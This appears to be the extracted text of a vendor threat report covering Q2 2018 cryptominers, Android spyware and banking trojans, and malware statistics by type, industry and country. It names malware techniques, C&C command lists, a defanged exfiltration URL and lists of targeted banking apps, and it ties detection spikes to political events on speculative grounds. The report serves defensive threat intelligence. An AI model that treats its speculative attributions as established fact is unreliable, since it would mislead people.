31 BadShell attacks enterprises Fileless malware is next-generation malware especially compared with traditional infection via exe files File-based malware resides on the hard drive making it easier to detect But fileless malware is different As its name suggests this type of malware represents malicious code injected into legitimate OS processes It need not be installed on a victim machine but functions only in memory making much harder for antiviruses to detect
Usually such malware is spread via malicious ad banners Clicking on a banner redirects a user to an infected website where the malware covertly installs itself into the victimrsquos computer As many antiviruses tools cannot detect it users remain unaware of being infected Not surprisingly its use by cybercriminals is on the increase
Last quarter Comodo Threat Research Labs analysts faced a scenario of just such an attack A company with several thousands of endpoints was compromised by fileless malware When their legacy security software failed to protect them the company looked to Comodo Threat Research Labs for assistance
Global Threat Report Q2 2018 Edition
Page 17 of 73
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes PowerShell to execute commands Task Scheduler to ensure persistence and Registry to hold the malicious binary code In the screenshots below you see how exactly the malware dubbed BadShell works
If we decode the PowerShell arguments we see the malicious code in the registry The code is injected into an existing running process by the PowerShell script
BadShell at work
Global Threat Report Q2 2018 Edition
Page 18 of 73
The malicious code in the registry
Global Threat Report Q2 2018 Edition
Page 19 of 73
This emergency clearly demonstrates how dangerous cryptominer activity can be Just imagine it the entire compute capacity of the enterprises computers was engaged in mining cryptocurrency depriving employees of the ability to perform their jobs Comodo analysts took over the situation and cleaned the infection from all involved computers but of course the financial losses of the company were irreversible
Invulnerability to an antivirus and persistence in the system are the most important attributes for a cryptominer because the more it runs within the infected system the more it profits the attackers That is why cybercriminals give special attention to the cryptominers ability to elude antivirus software
Below is another cunning technique that turns an infected machine into a slave of the attacker
32 WinstarNssmMiner a system killer Like other cryptominers The WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals But it has a special feature ndash it can root into a system so deeply that it becomes unremovable Attempting to kill it will kill the target system totally
The secret of WinstarNssmMinerrsquos persistence lies in its method of infecting a victimrsquos computer It consists of two processes injected into two system svchostexe processes The first performs the main task ndash mining cryptocurrency The other runs in the background looking for antivirus products and disables them
The malicious code disguised as svhostexe
Especially impressive is that both infected svchostexe processed possess the system attribute ldquoCriticalProcess meaning that terminating any of them will crash the system leaving the user with a blue screen
WinstarNssmMiner spreading around the world
Global Threat Report Q2 2018 Edition
Page 20 of 73
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victimsrsquo system but their cryptomining competitors
33 CoinMiner kills rivals CoinMiner stands out against other cryptominers with a kill list feature that checks the infected machine for the presence of other cryptomalware If an ldquoalienrdquo cryptominer is detected the feature will terminate its processes
CoinMiner kills its rivals as follows
The code below downloads CoinMiner for Windows architecture (x86 or x64) and then checks if a miner is already running by testing the presence of an ldquoAMDDriver64rdquo process
Global Threat Report Q2 2018 Edition
Page 21 of 73
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists named $malwares and $malwares2 with the names of the processes that it is instructed to kill The lists include other types of cryptominers
In this way CoinMiner undividedly occupies the victims computer to use its resources for mining cryptocurrency
Global Threat Report Q2 2018 Edition
Page 22 of 73
Some cryptominers earned the spotlight of the mass-media and cybersecurity researchers easing user detection In Q2 these cryptominers learned to hide CoinHive is the brightest example of them
34 CoinHive changes its skin CoinHive is a popular JavaScript cryptominer If you put its string of code into your website page every visitor to the site will mine coins for you
As you can see the CoinHive script is easily detected
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports users have started checking websites codes for cryptominers But in the second quarter perpetrators found a way to overcome this obstacle Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners
Global Threat Report Q2 2018 Edition
Page 23 of 73
As a result the malicious code on a webpage looks like this
The obfuscated malicious code on a webpage
If we decode the string we encounter an iframe
The iframe loads the URL shortener
The iframe loads the URL shortener Notice the width and height of the iframe are set to 1 to make the iframe as invisible as possible
Now letrsquos see at the URL httpscnhvco
And there we can find the familiar link to CoinHive
The link to CoinHive
Global Threat Report Q2 2018 Edition
Page 24 of 73
What is the impact of this trick In a simple scenario a user visits a CoinHive-infected website Noticing notices that her computerrsquos CPU is overloaded she decides to check the webpage code but doesnrsquot find any signs of a cryptominer So she concludes that something went wrong with her PC while CoinHive coopts her computer to mine cryptocoins
The next malware in the raw prefers not mining cryptocurrency but steal it on-the-fly
35 Cryptocurrency clipboard hijacker intercepts transfers It would be more accurate to call this program cryptothief rather than cryptominer Because it does not devour an infected machinersquos resources but instead actually steals cryptocurrency redirecting it to the perpetrator
Cryptocurrency transfers require a wallet address The address is a long string combined with different characters and numbers so it is almost impossible to remember it or fill in manually That is why users usually copy-paste a wallet address to make a transaction Cybercriminals regard this copy-paste process a breach they can use to their advantage
Cryptocurrency clipboard hijacker checks the clipboard for a wallet address copy Upon finding one it changes it for the address of the wallet under the attackers control So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminalsrsquo hands
New Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses
This malware is distributed in a bundle with the All-Radio 427 Portable software All-Radio 427 is a legitimate video and audio player created by Russian developers But cybercriminals copied the program and added the malicious code The malicious version of All-Radio 427 was used for spreading different types of malware clipboard cryptocurrency hijackers among them
Here is an example of a clipboard hijacker attack
A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm
Global Threat Report Q2 2018 Edition
Page 25 of 73
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity they seem to come back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors
Global Threat Report Q2 2018 Edition
Page 26 of 73
4 Android Devices Under Siege
41 Spying Stealing Mining Android devices are rapidly becoming high-value targets for cybercriminals and malware authors It is not surprising because today almost any smartphone is a treasure trove of information for perpetrators People increasingly use smartphones for financial operations but those are not the only jackpot for attackers Today every smartphone contains a plethora of confidential information about its owner
If the victim is a CEO politician or other VIP the content of the mobile device can be sold at the highest prices Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims Of course not only cybercriminals hunt for smartphone content Intelligence agencies and business competitors want to know everything about their targets Add jealous spouses tracking every move of their partners and parents wanting to control their children and you will easily understand why Android-oriented malware is a growing business
Today spying is the number one purpose of the Android malware In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them You can see the whole family of these digital spooks on the graph
The digital spooks
Global Threat Report Q2 2018 Edition
Page 27 of 73
Like real-world spies digital agents impersonate legitimate entities pretending to innocent applications or hiding malicious code inside legitimate software Like real spies they seek to remain invisible and constantly change disguises to avoid detection and hone their tradecraft from version to version
411 KevDroid The first is named KevDroid Itrsquos distributed in three versions
Version-1 Naver Defender
Version-2 Netease Defender
Version-3
PU
Disguises of KevDroid
The first version disguised as the Naver Defender application covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection This sample has multifunctional abilities for spying It steals account details contacts id name phone numbers and email address of the owner It grabs SMS messages and associated info It attempts to read call logs (number name type duration) emails (email type) and photos of the contacts After extracting all the data the malware encrypts it with ldquoAESrdquo algorithm and send to the attackersrsquo server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victimrsquos every phone call then encrypts and uploads it to the cybercriminalsrsquo server In addition it collects information about currently running services installed apps and the launcher name
The second version Netease Defender has additional spying abilities It takes control over the device camera and covertly records the victimrsquos activity Then it sends the video to the attackersrsquo server
Version-3 of KevDroid makes photos records call and creates a list of files on the device Also it extracts the web history account and contact details and the device information
People assume they are safe if they download apps exclusively from the official Google Play store This wrong assumption can be costly the first version of Desert Scorpion spyware was spread via official Google Play Services The spyware was camouflaged as a chat called Dardesh Instant App But when a user downloaded and ran it the app covertly connected to
Global Threat Report Q2 2018 Edition
Page 28 of 73
cybercriminalsrsquo Command and Control server and downloaded the spyware on the device From that moment the spyware constantly kept track of all events on the infected device Another means of the malware dissemination was social networks
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device
Global Threat Report Q2 2018 Edition
Page 29 of 73
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to Command amp Control server
Upload image files
Collect information about the application installed
Collect browserrsquos data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
